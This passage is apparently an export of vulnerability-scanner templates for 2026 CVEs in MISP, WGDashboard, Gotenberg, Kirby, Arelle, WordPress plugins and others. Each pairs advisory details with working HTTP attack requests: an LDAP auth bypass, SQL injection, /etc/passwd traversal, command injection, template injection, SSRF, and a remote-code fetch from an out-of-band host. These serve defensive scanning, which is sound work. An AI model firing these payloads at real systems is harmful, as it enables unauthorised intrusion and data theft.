CVE-2026-44551\n    epss-score: 0.01461\n    epss-percentile: 0.72428\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.title:\"Open WebUI\"\n  tags: cve,cve2026,open-webui,ldap,auth-bypass\n\nvariables:\n  username: \"{{username}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/auths/ldap HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"user\":\"{{username}}\",\"password\":\"\"}\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"token_type\":'\n          - '{\"id\":'\n          - '\"name\":'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '\"token\":\"([^\"]+)\"'\n# digest: 4a0a00473045022100d978118ae95a1b9387f43ce46951fe0d01b57ba1e5b50d50ad44205e05a2b2130220204501e5add508154463ebd15dcc63c351a1a7b969de52fecfb511f471185e99:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-44551.yaml","vuln_id":"cve-2026-44551"},{"raw":"id: CVE-2026-44381\n\ninfo:\n  name: MISP < 2.5.37 - SQL Injection\n  author: malcha\n  severity: medium\n  description: |\n    MISP before 2.5.37 is vulnerable to SQL injection via the order parameter in EventsController. The POST body order value is passed directly into ORDER BY clauses without validation.\n  impact: |\n    Attackers can manipulate SQL queries to access or modify unauthorized data, potentially compromising database integrity and confidentiality.\n  remediation: |\n    Upgrade MISP to version 2.5.37 or later.\n  reference:\n    - https://github.com/MISP/MISP/security/advisories/GHSA-4cxp-22wm-j6jr\n    - https://github.com/MISP/MISP/commit/53fc6be7da1c010ca4696a37c6e27bb699377efa\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-44381\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-44381\n    epss-score: 0.00666\n    epss-percentile: 0.50379\n    cwe-id: CWE-89\n  metadata:\n    max-request: 2\n    verified: true\n    shodan-query: http.title:\"MISP\"\n  tags: cve,cve2026,misp,sqli\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /users/login HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        words:\n          - \"MISP\"\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 30s\n        POST /events/index HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: {{auth_key}}\n        Content-Type: application/json\n\n        {\"order\":\"(SELECT 1 FROM (SELECT(SLEEP(8)))A)\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"duration >= 8\"\n          - \"status_code == 200 || status_code == 500\"\n        condition: and\n# digest: 490a00463044022059e90fa21f02cf176fb6d05b1e875c3434cc4e596d04d7f77010d918127c821a022029246e26f98b4886b4b6b5ede176c17f34486c56b6e4e451ed030425a10a3b16:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-44381.yaml","vuln_id":"cve-2026-44381"},{"raw":"id: CVE-2026-44343\n\ninfo:\n  name: WGDashboard < 4.3.2 - Unauthenticated File Read\n  author: str4k3r\n  severity: critical\n  description: |\n    WGDashboard < 4.3.2 contains a path traversal vulnerability caused by improper access control, letting unauthorized attackers access the host file system without authentication.\n  impact: |\n    Unauthorized attackers can access the host file system, potentially exposing sensitive data and compromising the system.\n  remediation: |\n    Update to version 4.3.2 or later.\n  reference:\n    - https://github.com/WGDashboard/WGDashboard/security/advisories/GHSA-rrf5-q4fp-qvgm\n    - https://github.com/WGDashboard/WGDashboard/commit/b15bbce9bc5554ec379d558f032c730db47fcea2\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-44343\n  classification:\n    cve-id: CVE-2026-44343\n    epss-score: 0.01548\n    epss-percentile: 0.73928\n    cwe-id: CWE-22\n    cvss-score: 9.8\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: wgdashboard\n    product: wgdashboard\n    fofa-query: title=\"WGDashboard\"\n  tags: cve,cve2026,wgdashboard,lfi,path-traversal,file-read,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(tolower(body), \"wgdashboard\", \"wireguard\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /fileDownload?file=../../../../etc/passwd HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"root:x:0:0:\")'\n        condition: and\n# digest: 490a004630440220280993d9e105c871dd3ca8c0b77a908d3e670d6fe93c5974a50fb5068a44730c02206d8ddde6121f3607f0b286c01cda141b6b1c5ff4bd8dcab7841034ae8ee6f92b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-44343.yaml","vuln_id":"cve-2026-44343"},{"raw":"id: CVE-2026-44338\n\ninfo:\n  name: PraisonAI - Authentication Bypass\n  author: jnoza\n  severity: high\n  description: |\n    PraisonAI 2.5.6 to < 4.6.34 contains a broken authentication caused by disabled default authentication in legacy Flask API server, letting remote attackers access /agents and trigger workflows without token, exploit requires network access to API server.\n  impact: |\n    Remote attackers can access and trigger agent workflows without authentication, potentially leading to unauthorized actions or data exposure.\n  remediation: Upgrade to version 4.6.34 or later.\n  reference:\n    - https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6rmh-7xcm-cpxj\n    - https://webflow.sysdig.com/blog/cve-2026-44338-praisonai-authentication-bypass-in-under-4-hours-and-the-growing-trend-of-rapid-exploitation\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n    cvss-score: 7.3\n    cve-id: CVE-2026-44338\n    epss-score: 0.28571\n    epss-percentile: 0.98048\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"PraisonAI\"\n  tags: cve,cve2026,praisonai,auth-bypass,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/agents\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains_all(body, 'agent_file', 'agents')\"\n          - \"contains(header, 'application/json')\"\n        condition: and\n# digest: 4a0a004730450221009250d4435908421ac3b431dcc7820ecfcf5ad0677f217337553d91441ff59b5902200a6147582dc77c062de4813340f833f215cb63b2fbe8913292791b9aa55911c5:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-44338.yaml","vuln_id":"cve-2026-44338"},{"raw":"id: CVE-2026-44262\n\ninfo:\n  name: Scramble Laravel - Remote Code Execution\n  author: joshuavanderpoll\n  severity: critical\n  description: |\n    Scramble for Laravel >= 0.13.2 and < 0.13.22 contains a remote code execution caused by evaluation of user-controlled input in validation rules during documentation generation, letting remote attackers execute arbitrary PHP code, exploit requires publicly accessible documentation endpoints.\n  impact: |\n    Remote attackers can execute arbitrary PHP code, potentially leading to full application compromise.\n  remediation: |\n    Upgrade to version 0.13.22 or later.\n  reference:\n    - https://github.com/advisories/GHSA-4rm2-28vj-fj39\n    - https://github.com/joshuavanderpoll/CVE-2026-44262\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-44262\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L\n    cvss-score: 9.4\n    cve-id: CVE-2026-44262\n    epss-score: 0.0586\n    epss-percentile: 0.92865\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 2\n  tags: cve,cve2026,laravel,scramble,php,rce\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/docs/api.json\"\n      - \"{{BaseURL}}/docs/api\"\n\n    stop-at-first-match: true\n    extractors:\n      - type: regex\n        name: name\n        part: body\n        group: 1\n        regex:\n          - '\"name\"\\s*:\\s*\"([^\"]+)\"[\\s\\S]{1,600}\"default\"\\s*:\\s*\"[^\"]*\\|[^\"]*\"'\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 30s\n        GET /docs/api.json?{{name}}=sleep(8) HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"duration >= 8\"\n          - \"status_code == 200\"\n        condition: and\n# digest: 4a0a004730450220158da4cec8056f2c8f866f78be2822c96edd19ede1b057992cfa6a53c1dca1a60221009864540b472a3f7d8d204a9c4905fd8761466b1201b7fea5610535c16c4c391e:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-44262.yaml","vuln_id":"cve-2026-44262"},{"raw":"id: CVE-2026-44177\n\ninfo:\n  name: Kirby CMS 5.3.0-5.4.0 - Path Traversal\n  author: str4k3r\n  severity: high\n  description: |\n    Kirby CMS versions 5.3.0 through 5.4.0 are vulnerable to a path traversal vulnerability via the /api/auth/login endpoint. An unauthenticated attacker may supply a specially crafted email value in the request body containing traversal sequences (such as \"../..\"), which the application concatenates directly into a filesystem path when hydrating user objects. This can result in the resolution of paths outside the intended accounts directory and may lead to the inclusion of unintended files such as index.php, causing a denial of service by exhausting memory limits. The issue is addressed in version 5.4.1 by properly validating and sanitizing the user-supplied input to prevent directory traversal.\n  impact: |\n    Attackers can include arbitrary PHP files and fingerprint server directories, potentially leading to code execution or information disclosure.\n  remediation: |\n    Update to version 5.4.1 or later.\n  reference:\n    - https://github.com/getkirby/kirby/security/advisories/GHSA-9hx7-c53c-v6x8\n    - https://github.com/getkirby/kirby/releases/tag/5.4.1\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-44177\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N\n    cvss-score: 8.8\n    cve-id: CVE-2026-44177\n    epss-score: 0.0177\n    epss-percentile: 0.77156\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 2\n    product: kirby\n    vendor: getkirby\n    shodan-query: http.favicon.hash:987600836\n    fofa-query: icon_hash=\"987600836\"\n  tags: cve,cve2026,kirby,cms,lfi,traversal\n\nhttp:\n  - raw:\n      - |\n        GET /panel/installation HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: csrf\n        part: body\n        group: 1\n        regex:\n          - '\"csrf\":\"([a-f0-9]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /api/auth/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        X-CSRF: {{csrf}}\n\n        {\"email\":\"../../\",\"password\":\"x\",\"long\":false}\n\n    matchers-condition: or\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"currently offline due to an unexpected error\"\n\n      - type: word\n        part: body\n        words:\n          - \"Allowed memory size of\"\n          - \"bytes exhausted (tried to allocate\"\n        condition: and\n# digest: 490a0046304402204e7110793c2187dad732378f507d95c9e9df6fd51d4b5d09cacf4137cf58e8dc02202de33c451c437c7beb29f38215e1982d1a0589575e913d077b4f277e14c57a49:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-44177.yaml","vuln_id":"cve-2026-44177"},{"raw":"id: CVE-2026-42878\n\ninfo:\n  name: FacturaScripts - Unauthenticated phpinfo Disclosure\n  author: ChrisJr404\n  severity: medium\n  description: |\n    Detected FacturaScripts exposes a debug branch in the Installer controller that calls phpinfo() when the request carries the phpinfo=TRUE query parameter, and on an instance that has not finished installation, this endpoint was reachable without authentication.\n  impact: |\n    Remote attackers can access sensitive PHP configuration and environment variables, exposing credentials and secrets.\n  remediation: |\n    Update to version 2026 or later.\n  reference:\n    - https://github.com/advisories/GHSA-vrxf-vrc4-22p7\n    - https://github.com/NeoRazorX/facturascripts/blob/master/Core/Controller/Installer.php\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-42878\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-42878\n    epss-score: 0.00552\n    epss-percentile: 0.44978\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: facturascripts\n    product: facturascripts\n    shodan-query: html:\"FacturaScripts installer\"\n    fofa-query: body=\"FacturaScripts installer\"\n  tags: cve,cve2026,facturascripts,phpinfo,exposure,disclosure,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, \\\"FacturaScripts installer\\\")\"\n        condition: and\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?phpinfo=TRUE\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains_all(to_lower(body), \\\"phpinfo()</title>\\\", \\\"php version\\\")\"\n        condition: and\n# digest: 490a004630440220660b958b88c7f1caab0b42c7ac45b50900b74c170a80b9a962569ced9e01537802205a5d3d589d8d2b7a0e5b9d869b891ced04c42ef4675311cb5e05eef5fe55fb31:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-42878.yaml","vuln_id":"cve-2026-42878"},{"raw":"id: CVE-2026-42796\n\ninfo:\n  name: Arelle < 2.39.10 - Remote Code Execution\n  author: aryu-ru\n  severity: critical\n  description: |\n    Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the webserver's /rest/configure endpoint. The plugins query parameter is forwarded to the plugin manager without authentication, allowing an attacker to supply a URL to a remote Python file that Arelle downloads and executes within its process.\n  impact: |\n    Successful exploitation allows an unauthenticated attacker to execute arbitrary Python code with the privileges of the Arelle webserver process, leading to full host compromise.\n  remediation: |\n    Upgrade to Arelle 2.39.10 or later, which rejects remote URL plug-in references over the webserver.\n  reference:\n    - https://www.vulncheck.com/advisories/arelle-unauthenticated-rce-via-rest-configure\n    - https://github.com/Arelle/Arelle/pull/2320\n    - https://github.com/Arelle/Arelle/releases/tag/2.39.10\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-42796\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-42796\n    epss-score: 0.02747\n    epss-percentile: 0.85545\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: arelle\n    product: arelle\n    shodan-query: http.html:\"Arelle Web Services\"\n  tags: cve,cve2026,arelle,rce,oast,unauth,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/rest/configure?plugins=http://{{interactsh-url}}/{{randstr}}.py\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: body\n        words:\n          - \"Configuration Request\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100a93287be618bbd70fef969dd3c4644b22d292e1a89aaca54fa47d0c19c6fd565022100f45f77222988fcb82b801742c69f03ef4bfb2c1421777765de860bf2647674d9:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-42796.yaml","vuln_id":"cve-2026-42796"},{"raw":"id: CVE-2026-42647\n\ninfo:\n  name: JoomSport <= 5.7.7 - SQL Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    The JoomSport WordPress plugin through 5.7.7 is vulnerable to unauthenticated time-based blind SQL injection via the 'sortf' GET parameter in the player list view. The parameter value is backtick-wrapped and directly concatenated into an ORDER BY clause.\n  impact: |\n    Unauthenticated attackers can extract any data from the WordPress database including admin credentials, user emails, and plugin-stored secrets via time-based blind SQL injection.\n  remediation: |\n    Update to JoomSport version 5.7.8 or later, which implements column whitelist validation.\n  reference:\n    - https://patchstack.com/database/wordpress/plugin/joomsport-sports-league-results-management/vulnerability/wordpress-joomsport-plugin-5-7-7-sql-injection-vulnerability\n    - https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/tags/5.7.5/sportleague/base/wordpress/classes/class-jsport-getplayers.php#L153\n    - https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/tags/5.7.5/sportleague/classes/objects/class-jsport-playerlist.php#L80\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-42647\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L\n    cvss-score: 9.3\n    cve-id: CVE-2026-42647\n    epss-score: 0.01323\n    epss-percentile: 0.69665\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: beardev\n    product: joomsport-sports-league-results-management\n    framework: wordpress\n  tags: cve,cve2026,wp,wordpress,wp-plugin,joomsport,sqli,vkev\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-sitemap-posts-joomsport_season-1.xml\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"<loc>\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: season_path\n        part: body\n        group: 1\n        regex:\n          - '<loc>[^<]*?//[^/]+(\\/[^<]+)</loc>'\n        internal: true\n\n  - raw:\n      - |\n        GET {{season_path}}?action=playerlist&sortf=post_title&sortd=ASC HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"Name\", \"Match played\", \"Played minutes\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 20s\n        GET {{season_path}}?action=playerlist&sortf=post_title%60,(SELECT/**/x/**/FROM/**/(SELECT/**/SLEEP(6)/**/AS/**/x)/**/AS/**/t)%23&sortd=ASC HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration >= 6'\n          - 'status_code == 200'\n          - 'contains_all(body, \"Name\", \"Match played\", \"Played minutes\")'\n        condition: and\n# digest: 4a0a00473045022100c2e72c258072c0af5de57ed803cbbd7601afbafe2998a9067206a592a516345302205e676ea162fbcac734ec1e3cd234f6e73ac15e32df963a1ea8a695f24fad45ae:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-42647.yaml","vuln_id":"cve-2026-42647"},{"raw":"id: CVE-2026-42596\n\ninfo:\n  name: Gotenberg < 8.31.0 - Server-Side Request Forgery\n  author: str4k3r\n  severity: critical\n  description: |\n    Gotenberg before 8.31.0 is vulnerable to server-side request forgery (SSRF) due to insufficient validation of URLs in the downloadFrom API. An unauthenticated attacker can exploit the flaw by providing specially crafted IPv4-mapped IPv6 addresses (such as http://[::ffff:127.0.0.1]) that bypass the deny-list and allow access to internal resources. Fixed versions properly recognize these addresses and prevent such requests.\n  reference:\n    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-4vmc-gm8v-m35h\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-42596\n  classification:\n    cve-id: CVE-2026-42596\n    epss-score: 0.01239\n    epss-percentile: 0.6779\n    cvss-score: 9.8\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cwe-id: CWE-918\n    cpe: cpe:2.3:a:gotenberg:gotenberg:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    verified: true\n    shodan-query: \"Gotenberg\"\n    fofa-query: \"Gotenberg\"\n  tags: cve,cve2026,gotenberg,ssrf\n\nhttp:\n  - raw:\n      - |\n        POST /forms/libreoffice/convert HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----testBoundary\n\n        ------testBoundary\n        Content-Disposition: form-data; name=\"downloadFrom\"\n\n        [{\"url\":\"http://[::ffff:127.0.0.1]:3000/health\"}]\n        ------testBoundary--\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"No 'Content-Disposition' header from 'http://[::ffff:127.0.0.1]:3000/health'\"\n\n      - type: status\n        status:\n          - 400\n# digest: 4b0a00483046022100f93e4b1f41f4b3b8626301f9c6e54bb0f819a2a36fcab4d6d8c50782615fec30022100df96a885e4ac32a170fead310107ea2c93e0e697da34505e3593b88792ebe887:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-42596.yaml","vuln_id":"cve-2026-42596"},{"raw":"id: CVE-2026-42589\n\ninfo:\n  name: Gotenberg - Command Injection\n  author: fineman999\n  severity: critical\n  description: |\n    Gotenberg < 8.31.0 contains a command injection caused by lack of validation on JSON metadata keys in /forms/pdfengines/metadata/write endpoint, letting unauthenticated attackers execute OS commands, exploit requires crafted HTTP request.\n  impact: |\n    Unauthenticated attackers can execute arbitrary OS commands remotely, potentially leading to full system compromise.\n  remediation: |\n    Update to version 8.31.0 or later.\n  reference:\n    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rqgh-gxv4-6657\n    - https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-42589\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-42589\n    epss-score: 0.03013\n    epss-percentile: 0.8683\n    cwe-id: CWE-78\n  metadata:\n    verified: true\n    vendor: gotenberg\n    product: gotenberg\n    max-request: 2\n  tags: cve,cve2026,gotenberg,exiftool,rce,unauth,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /version HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'compare_versions(version, \"< 8.31.0\")'\n          - 'contains(to_lower(header), \"gotenberg\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - \"([0-9.]+)\"\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 10s\n        POST /forms/pdfengines/metadata/write HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}\n\n        ------WebKitFormBoundary{{randstr}}\n        Content-Disposition: form-data; name=\"files\"; filename=\"sample.pdf\"\n        Content-Type: application/pdf\n\n        %PDF-1.1\n        1 0 obj\n        << /Type /Catalog /Pages 2 0 R >>\n        endobj\n        2 0 obj\n        << /Type /Pages /Kids [3 0 R] /Count 1 >>\n        endobj\n        3 0 obj\n        << /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>\n        endobj\n        xref\n        0 4\n        0000000000 65535 f\n        0000000009 00000 n\n        0000000058 00000 n\n        0000000115 00000 n\n        trailer\n        << /Root 1 0 R /Size 4 >>\n        startxref\n        186\n        %%EOF\n        ------WebKitFormBoundary{{randstr}}\n        Content-Disposition: form-data; name=\"metadata\"\n\n        {\"Title\\n-if\\nsystem('sleep 6')||1\\n-Comment\":\"x\"}\n        ------WebKitFormBoundary{{randstr}}--\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 500\"\n          - \"duration >= 6\"\n        condition: and\n# digest: 4a0a004730450220396b13a105b28b138381be4277554cdeec26a693a91e2384360c2e9601d7a9990221009324f895fcc979f49bb611f2bd55e81c6430f3f5fe57a80e8a1970ce0cf905f1:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-42589.yaml","vuln_id":"cve-2026-42589"},{"raw":"id: CVE-2026-4257\n\ninfo:\n  name: WordPress Contact Form by Supsystic - Server-Side Template Injection\n  author: theamanrawat\n  severity: critical\n  description: |\n    Contact Form by Supsystic WordPress plugin <= 1.7.36 contains a server-side template injection caused by unsandboxed Twig_Loader_String and cfsPreFill functionality, letting unauthenticated attackers execute arbitrary code remotely via GET parameters.\n  impact: |\n    Unauthenticated attackers can execute arbitrary PHP functions and OS commands remotely, leading to full server compromise.\n  remediation: |\n    Update to the latest version beyond 1.7.36.\n  reference:\n    - https://patchstack.com/database/vulnerability/wordpress-contact-form-by-supsystic-plugin-1-7-36-unauthenticated-server-side-template-injection-via-prefill-functionality-vulnerability\n    - https://plugins.trac.wordpress.org/browser/contact-form-by-supsystic/tags/1.7.36/modules/forms/views/forms.php#L323\n    - https://plugins.trac.wordpress.org/changeset/3491826/contact-form-by-supsystic\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-4257\n    epss-score: 0.41475\n    epss-percentile: 0.98613\n    cwe-id: CWE-94\n  metadata:\n    max-request: 7\n    verified: true\n    vendor: supsystic\n    product: contact_form\n    framework: wordpress\n    shodan-query: http.component:\"WordPress\"\n  tags: cve,cve2026,wordpress,wp-plugin,contact-form-by-supsystic,ssti,rce,twig,unauth\n\nvariables:\n  num1: \"{{rand_int(40000, 44800)}}\"\n  num2: \"{{rand_int(40000, 44800)}}\"\n  result: \"{{to_number(num1)*to_number(num2)}}\"\n\nflow: |\n  http(1);\n  let found = [];\n  let seen = {};\n  for (let p of iterate(template[\"page-paths\"])) {\n    if (!seen[p]) {\n      seen[p] = true;\n      found.push(p);\n    }\n  }\n  let defaults = [\"/?page_id=2\", \"/?page_id=3\", \"/?page_id=4\", \"/?page_id=5\", \"/?page_id=6\"];\n  for (let d of defaults) {\n    if (!seen[d]) {\n      seen[d] = true;\n      found.push(d);\n    }\n  }\n  for (let page of found) {\n    let sep = page.includes(\"?\") ? \"&\" : \"?\";\n    set(\"pagepath\", page + sep);\n    if (http(2)) break;\n  }\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/\"\n\n    extractors:\n      - type: regex\n        name: page-paths\n        internal: true\n        group: 1\n        regex:\n          - 'href=\"(?:https?://[^/\"]+)?(/\\?page_id=\\d+)'\n          - 'href=\"(?:https?://[^/\"]+)?(/[a-z][a-z0-9-]+/)'\n        part: body\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}{{pagepath}}cfsPreFill=1&first_name=%7B%7B{{num1}}*{{num2}}%7D%7D\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'value=\"{{result}}\"'\n\n      - type: word\n        part: body\n        words:\n          - 'contact-form-by-supsystic'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502200f46e48adcaf30016f2134d934f149a6557254e1b259d41ae19cec4365493580022100fb0a39a05d43cb6d02142d85d743698e2f9e5dd1d3587d7cab22ecf2db0c1dd2:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-4257.yaml","vuln_id":"cve-2026-4257"},{"raw":"id: CVE-2026-42569\n\ninfo:\n  name: phpVMS < 7.0.6 - Legacy Importer Authorization Bypass\n  author: 0x_Akoko\n  severity: critical\n  description: |\n   phpVMS < 7.0.6 contains an authentication bypass caused by unauthenticated access to a legacy import feature, letting unauthenticated attackers access restricted functionality, exploit requires no special privileges.\n  impact: |\n   Unauthenticated attackers can access restricted import functionality, potentially leading to unauthorized data manipulation or system compromise.\n  remediation: |\n   Update to version 7.0.6 or later.\n  reference:\n    - https://github.com/phpvms/phpvms/security/advisories/GHSA-fv26-4939-62fh\n    - https://github.com/phpvms/phpvms/commit/f59ba8e0e8fc25c60c3faf14e526cfd49df3f7dc\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-42569\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H\n    cvss-score: 9.4\n    cve-id: CVE-2026-42569\n    epss-score: 0.01173\n    epss-percentile: 0.6612\n    cwe-id: CWE-284,CWE-306,CWE-862\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: phpvms\n    product: phpvms\n    shodan-query: http.html:\"phpvms\"\n    fofa-query: app=\"phpVMS\"\n  tags: cve,cve2026,phpvms,auth-bypass,unauth\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/importer\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(to_lower(body), \"importer\", \"phpvms\")'\n          - 'contains_any(body, \"Import Configuration\", \"Database Config\", \"Start Importer\", \"WIPE OUT YOUR EXISTING DATA\", \"importer/config\")'\n        condition: and\n# digest: 4b0a00483046022100dd73fe74ab431844bb89b19582133090ba13fba8b3beb658d1b7cc319d03f9890221009ae9c1ea5318660c0e7f08485e0cf6b0508af821e4491b753a51dc93c9f7aa3d:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-42569.yaml","vuln_id":"cve-2026-42569"},{"raw":"id: CVE-2026-42461\n\ninfo:\n  name: Arcane < 1.18.0 - Unauthenticated Template and Env Disclosure\n  author: str4k3r\n  severity: high\n  description: |\n    Arcane < 1.18.0 contains an information disclosure caused by missing authorization on /api/templates GET endpoints, letting unauthenticated network clients read sensitive Compose YAML and .env content, exploit requires network access\n  impact: |\n    Unauthenticated attackers can read sensitive operator secrets like database passwords and API keys, risking full system compromise.\n  remediation: |\n    Update to version 1.18.0 or later.\n  reference:\n    - 